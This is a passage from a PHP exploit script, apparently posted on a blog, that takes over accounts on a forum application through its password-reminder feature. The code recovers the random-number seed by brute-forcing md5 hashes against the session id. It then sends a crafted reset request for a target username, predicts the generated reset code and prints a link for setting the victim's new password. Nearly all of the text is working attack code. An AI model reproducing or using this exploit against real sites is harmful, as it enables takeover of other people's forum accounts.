}
}
if($md5) {
$seed = getseed($md5);
if($seed) {
echo "[+] Seed for next random number is $seed\n";
} else die("[-] Can't calculate seed\n");
}
else die("[-] Random number hash not found\n");
function getseed($md5) {
global $sess;
for($i=0;$i<=32767;$i++){
if($md5 == md5($sess . $i)) {
return $i;
}
}
}
$sc = md5($sess . $seed);
$data = "user=".urlencode($username)."&sc=$sc";
$packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cookie: PHPSESSID=$sess;\r\n";
$packet.= "Connection: close\r\n";
$packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
$packet.= $data;
fputs($ock, $packet);
$resp='';
while(!feof($ock)) {
$resp .= fgets($ock);
}
if(preg_match("@HTTP/1.(0|1) 200 OK@i",$resp)===false) {
die("[-] An error ocurred while requesting validation code\n");
}
if(strpos($resp,"javascript:history.go(-1)")!==false) {
die("[-] Invalid username\n");
}
srand($seed);
for($i=0;$i<6;$i++){
rand();
}
$password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n";
?>
0 comentarios:
Publicar un comentario